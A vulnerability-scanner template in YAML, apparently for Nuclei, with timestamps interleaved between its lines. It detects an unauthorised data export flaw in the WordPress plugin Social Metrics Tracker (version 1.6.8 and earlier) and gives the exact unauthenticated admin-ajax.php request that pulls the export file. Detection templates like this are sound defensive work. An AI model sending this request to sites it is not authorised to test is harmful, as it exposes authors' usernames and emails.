2020-09-26 08:20:15 +00:00
id : wordpress-social-metrics-tracker
info :
name : Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
author : randomrobbie
severity : medium
2022-08-10 09:15:01 +00:00
description : |
The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email.
2022-08-06 16:54:58 +00:00
reference :
- https://wpscan.com/vulnerability/f4eed3ba-2746-426f-b030-a8c432defeb2
2022-08-27 04:41:18 +00:00
tags : wordpress,wp-plugin,wp,unauth,wpscan
2020-09-26 08:20:15 +00:00
requests :
- method : GET
path :
2020-09-27 07:44:52 +00:00
- "{{BaseURL}}/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1"
2020-09-26 08:20:15 +00:00
matchers-condition : and
matchers :
- type : word
2022-08-10 09:15:01 +00:00
part : body
2020-09-26 08:20:15 +00:00
words :
- "Main URL to Post"
2022-08-10 09:15:01 +00:00
- type : status
status :
- 200